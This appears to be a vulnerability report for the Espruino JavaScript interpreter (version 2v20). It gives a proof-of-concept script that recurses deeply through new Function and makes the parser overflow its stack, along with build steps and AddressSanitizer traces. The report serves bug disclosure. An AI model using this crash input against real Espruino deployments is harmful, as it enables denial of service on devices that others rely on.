stack-overflow in jspeFactorFunctionCall

[Ye0nny]

Espruino revision

Commit: fcc9ba4
Version: 2v20

Build platform

Ubuntu 20.04.5 LTS (Linux 5.4.0-144-generic x86_64)

Build steps

export CCFLAGS='-g -fsanitize=address -fno-omit-frame-pointer'
export LDFLAGS='-fsanitize=address'
DEBUG=1 make

Test case

testcase

var n = " ( foo " ; try { for ( i = 0 ; i < 16 ; i ++ ) { var var0 = " a " ; n += n ; } var r = new Function ( n ) ; do { r ( ) ; try { } catch { } } } ; for ( var r = 0 ; r < 12 ; r ++ ) assertEq ( isNaN ( new Date ( 1000000.0, " " ). getTime ( ) ), isNaN ( new Date ( 1e3 ). getTime ( ) ), isNaN ( new Date ( " 123 " ) ), isNaN ( new Date ( - 1000000.0, " : " ). getTime ( ) ), n, n, n, n, n, n, n, n, n, n, n, n, n, n, n, n, n, n, n, n, n, n, n, n, n, n, n, n, n, n, n, n, n, n, " done " ) ; } catch ( i ) { }

// poc.js
var n = " ( foo " ;

try {
        for ( i = 0 ; i < 16 ; i ++ ) {
                var var0 = " a " ;
                n += n ;
        }
        var r = new Function ( n ) ;
        do { r ( ) ; try { } catch { } }
} ;

Execution steps & Output

$ ./espruino poc.js

 ____                 _
|  __|___ ___ ___ _ _|_|___ ___
|  __|_ -| . |  _| | | |   | . |
|____|___|  _|_| |___|_|_|_|___|
         |_| espruino.com
 2v20 (c) 2023 G.Williams

Espruino is Open Source. Our work is supported
only by sales of official boards and donations:
http://espruino.com/Donate

AddressSanitizer:DEADLYSIGNAL
=================================================================
==1963515==ERROR: AddressSanitizer: stack-overflow on address 0x7ffe4d1d0fe5 (pc 0x556139b3d06b bp 0x7ffe4d1d1060 sp 0x7ffe4d1d0fe0 T0)
#0 0x556139b3d06a in jspeFactorFunctionCall src/jsparse.c:1220
#1 0x556139b3f753 in jspePostfixExpression src/jsparse.c:1946
#2 0x556139b3f8d2 in jspeUnaryExpression src/jsparse.c:1970
#3 0x556139b4019e in jspeBinaryExpression src/jsparse.c:2129
#4 0x556139b4037d in jspeConditionalExpression src/jsparse.c:2165
#5 0x556139b406ea in jspeAssignmentExpression src/jsparse.c:2225
#6 0x556139b3afd2 in jspeParseFunctionCallBrackets src/jsparse.c:512
#7 0x556139b3c4a4 in jspeFunctionCall src/jsparse.c:943
#8 0x556139b3d45a in jspeFactorFunctionCall src/jsparse.c:1322
#9 0x556139b3f753 in jspePostfixExpression src/jsparse.c:1946
...
...
#239 0x556139b3c4a4 in jspeFunctionCall src/jsparse.c:943
#240 0x556139b3d45a in jspeFactorFunctionCall src/jsparse.c:1322
#241 0x556139b3f753 in jspePostfixExpression src/jsparse.c:1946
#242 0x556139b3f8d2 in jspeUnaryExpression src/jsparse.c:1970
#243 0x556139b4019e in jspeBinaryExpression src/jsparse.c:2129
#244 0x556139b4037d in jspeConditionalExpression src/jsparse.c:2165
#245 0x556139b406ea in jspeAssignmentExpression src/jsparse.c:2225
#246 0x556139b3afd2 in jspeParseFunctionCallBrackets src/jsparse.c:512
#247 0x556139b3c4a4 in jspeFunctionCall src/jsparse.c:943
#248 0x556139b3d45a in jspeFactorFunctionCall src/jsparse.c:1322

SUMMARY: AddressSanitizer: stack-overflow src/jsparse.c:1220 in jspeFactorFunctionCall
==1963515==ABORTING

---

when executed in release mode

Output

 ____                 _
|  __|___ ___ ___ _ _|_|___ ___
|  __|_ -| . |  _| | | |   | . |
|____|___|  _|_| |___|_|_|_|___|
         |_| espruino.com
 2v20 (c) 2023 G.Williams

Espruino is Open Source. Our work is supported
only by sales of official boards and donations:
http://espruino.com/Donate

Segmentation fault

Credits: @Ye0nny, @EJueon